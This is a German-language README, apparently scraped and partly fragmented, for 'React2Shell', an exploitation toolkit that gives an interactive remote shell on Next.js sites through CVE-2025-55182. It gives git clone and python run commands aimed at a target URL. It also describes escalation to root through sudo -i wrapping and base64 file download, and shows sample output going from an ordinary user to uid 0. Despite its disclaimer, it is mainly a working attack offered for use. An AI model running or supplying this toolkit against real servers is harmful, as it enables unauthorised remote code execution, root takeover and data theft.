
Erweitertes Exploitation-Toolkit für Next.js Server Actions (CVE-2025-55182)
Fortschrittliches Exploitation-Toolkit für Next.js Server Actions (CVE-2025-55182).
React2Shell ist ein leistungsstarker, interaktiver Shell-Wrapper, der entwickelt wurde, um die React2Shell-Sicherheitslücke auszunutzen. Es geht über einfache RCE hinaus, indem es Befehlsverlauf, Dateiübertragungsfunktionen und automatisierte Privilegien-Eskalationsstrategien bietet.
base64 | sudo -i), um Shell-Einschränkungen zu umgehen und sofort Root zu erlangen..download <remote> [local]: Zuverlässiger binär-sicherer Dateidownload mittels Base64-Kodierung..save: Befehlsausgabe in lokale Beweissicherungsdateien speichern.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
Ausführen mit verifizierter Erkennung der Root-Persistenzstrategie:
python3 react2shell.py -u https://target.com/
Once inside the shell:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
NUR ZU BILDUNGSZWECKEN. Dieses Tool ist ausschließlich für Sicherheitsforschung und autorisierte Tests bestimmt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Scannen oder exploitieren Sie keine Ziele, für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Entwickelt für ethische Penetrationstests und Red-Teaming-Operationen.
| Befehl | Beschreibung |
|---|
.root | Root-Modus umschalten (Befehle in sudo -i einwickeln) |
.download <file> | Eine Datei vom entfernten Server herunterladen |
.save | Die Ausgabe des letzten Befehls in eine Datei speichern |
.exit | Shell beenden |